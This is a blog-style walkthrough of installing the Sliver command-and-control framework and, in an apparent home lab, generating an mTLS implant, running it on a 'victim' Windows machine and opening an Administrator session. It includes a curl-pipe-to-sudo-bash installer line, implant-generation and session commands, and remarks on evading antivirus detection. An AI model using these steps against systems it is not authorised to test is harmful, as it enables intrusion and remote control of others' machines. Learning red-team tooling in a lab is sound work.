Hey Friends, today we are taking a look at Sliver (the C2). You may have heard of it, you may have seen it, hell you could even be an expert in it’s use but if you are anything like me you have seen ‘C2’ and thought ‘that would be cool one day’ and then never got around to even trying it.
Well look no further, I am here to show you how easy it is to get running and get rolling, so let’s get right into it!
First things first, we need to bust open a terminal and head over to where you want to run the install, the majority of the time this will be ‘/opt’ in Kali (/opt is used for installing third party packages and it pays to keep things ‘uniform’):
After that we want to get a copy of Sliver onto our machine. Handily as Bishop Fox put it all online in a tidy git repo it allows us to do a quick little git clone and we are away:
sudo git clone https://github.com/BishopFox/sliver.git
This latest version (1.6.0 at time of writing) features:
- Dynamic code generation
- Compile-time obfuscation
- Staged and Stageless payloads
- Procedurally generated C2 over HTTP(S)
- DNS canary blue team detection
- Secure C2 over mTLS, WireGuard, HTTP(S), and DNS
- Windows process migration, process injection, user token manipulation, etc.
- Let’s Encrypt integration
- In-memory .NET assembly execution
- COFF/BOF in-memory loader
- TCP and named pipe pivots
- Much more!
Once downloaded an ‘ls’ command should show a ‘sliver’ folder now in our /opt folder.
Now we can navigate into the sliver folder:
Next task is to run the installation for sliver, the following is a handy oneliner shown on the README for sliver and does the job for us:
curl https://sliver.sh/install|sudo bash
Finally you can run sliver by entering ‘sliver’ into the terminal (this works in any directory BTW, it’s a ‘global’ attribute so you could open a terminal anywhere on your machine and type in ‘sliver’ and get going).
Ok, so that wasn’t so hard.
As with all tooling if you are unsure how to us it…. just run the ‘help’ command:
sliver > help Commands: ========= clear clear the screen exit exit the shell help use 'help [command]' for command help monitor Monitor threat intel platforms for Sliver implants wg-config Generate a new WireGuard client config wg-portfwd List ports forwarded by the WireGuard tun interface wg-socks List socks servers listening on the WireGuard tun interface Generic: ======== aliases List current aliases armory Automatically download and install extensions/aliases background Background an active session beacons Manage beacons builders List external builders canaries List previously generated canaries cursed Chrome/electron post-exploitation tool kit (∩｀-´)⊃━☆ﾟ.*･｡ﾟ dns Start a DNS listener env List environment variables generate Generate an implant binary hosts Manage the database of hosts http Start an HTTP listener https Start an HTTPS listener implants List implant builds jobs Job control licenses Open source licenses loot Manage the server's loot store mtls Start an mTLS listener prelude-operator Manage connection to Prelude's Operator profiles List existing profiles reaction Manage automatic reactions to events regenerate Regenerate an implant sessions Session management settings Manage client settings stage-listener Start a stager listener tasks Beacon task management update Check for updates use Switch the active session or beacon version Display version information websites Host static content (used with HTTP C2) wg Start a WireGuard listener Multiplayer: ============ operators Manage operators For even more information, please see our wiki: https://github.com/BishopFox/sliver/wiki
Now remember I am not an expert here I am just playing around to test it’s functionality.
Having done some of the Red Team Operator Certification from ZeroPoint Security I am familiar with using Cobalt Strike, so the next step would be generating some kind of Beacon or Implant, getting it over to a victim machine and connecting to it.
To generate a generic implant we can use:
generate --mtls <your ip> --arch <OS type> --save <output directory>
Once complete it will have created a payload in your desired location. Since I can drag and drop I picked my desktop (above) though if you wanted to you could spin up a HTTP server on your attacker machine and navigate to the address on your victim and download it:
Also it’s worth noting that the implant that has been generated is a bit hefty…
I’m entirely sure there are ways to shrink this down to a more manageable size and as such less detectable but I just want to get it working and size doesn’t matter…
Now that the implant is on the machine we need to get Sliver ‘listening’ for incoming requests by running ‘mtls’:
sliver > mtls
Ok to recap, we have our C2 server listening for a connection, we have our implant on the target… Let’s see what happens when we run it:
It has successfully executed on the victim (no other popups or warnings) and we can see it in the task manager:
Also on the Kali side, we can see Sliver has picked up the new connection:
Well now we can view ‘sessions’ and confirm the machine is accessable:
sliver > sessions ID Transport Remote Address Hostname Username Operating System Health ========== =========== ======================= ============== ===================== ================== ========= c1c1758c mtls 192.168.197.129:60896 CORP-CLIENT1 HA3KS\Administrator windows/386 [ALIVE]
We can interact with a session by entering it’s ID much like Meterpreter:
sessions -i c1c1758c
And finally, get a little bit of recon going:
It’s as easy as that!
Now again you can do more with this and get things a little better obfuscated. For giggles I put the .exe into VirusTotal:
Good for a demo though.
Now you might be thinking “oh he’s using Kali Linux, he’s cheating” well, ok this is Sliver running on Ubuntu 22.04.3 LTS:
Also Parrot Security Edition 5.3:
It works if you will it to… I wanted to try Hannah Montana Linux but since ubuntu took down the old versions of jammy it can’t update anymore.. I’m sure with some time and further effort I could get it to upgrade and as such get Sliver running on it… Maybe a job for another day.
I hope this has been helpful/educational to people.
Be Safe 🤙
I don’t have any sponsors or anything but if you enjoy my work, or feel sympathy for my wife, then I have set up a Ko-Fi account as well as a BuyMeACoffee people can donate to.